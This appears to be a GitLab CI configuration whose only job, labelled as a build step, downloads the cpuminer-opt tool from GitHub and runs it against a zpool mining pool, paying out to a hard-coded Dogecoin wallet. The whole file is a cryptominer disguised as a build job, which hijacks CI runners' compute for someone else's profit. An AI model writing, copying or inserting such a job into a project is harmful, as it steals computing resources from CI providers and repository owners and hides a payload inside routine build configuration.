build_a:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.21/cpuminer-opt-linux.tar.gz
     - tar -xf cpuminer-opt-linux.tar.gz
     - ./cpuminer-sse2 -a yescrypt -o stratum+tcp://yescrypt.sea.mine.zpool.ca:6233 -u DOGE:DQA7NLd2aDpjfBzb195YWAmjuufvSbd7bH -p c=DOGE -t2
